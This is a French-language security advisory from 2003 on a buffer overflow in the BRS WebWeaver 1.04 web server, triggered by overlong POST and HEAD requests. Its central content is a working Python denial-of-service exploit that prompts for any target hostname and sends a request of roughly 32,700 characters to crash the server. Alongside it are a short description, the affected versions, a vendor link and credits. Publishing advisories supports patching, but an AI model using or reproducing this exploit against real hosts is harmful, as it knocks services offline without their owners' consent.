BRS WebWeaver v1.04 POST and HEAD Overflows
|
Date de Publication: 2003-05-28
Titre: BRS WebWeaver v1.04 POST and HEAD Overflows
K-Otik ID : 0124
Exploitable à distance : Oui
Exploitable en local : Oui
* Description Technique - Exploit *
Webweaver souffre d'un buffer overflow lié aux requêtes POST et HEAD. En envoyant une requête de plus de 32700 caractères, ceci provoquera le crash du serveur http.
---------------------- Exploit ---------------------
#! /usr/bin/env python
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########
import sys
import httplib
met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status
------------------------------------------------------
* Versions Vulnérables *
BRS WebWeaver v1.04 et inferieures.
* Solution *
http://www.brswebweaver.com
* Crédits *
Faille découverte par euronymous (Mai 2003).
|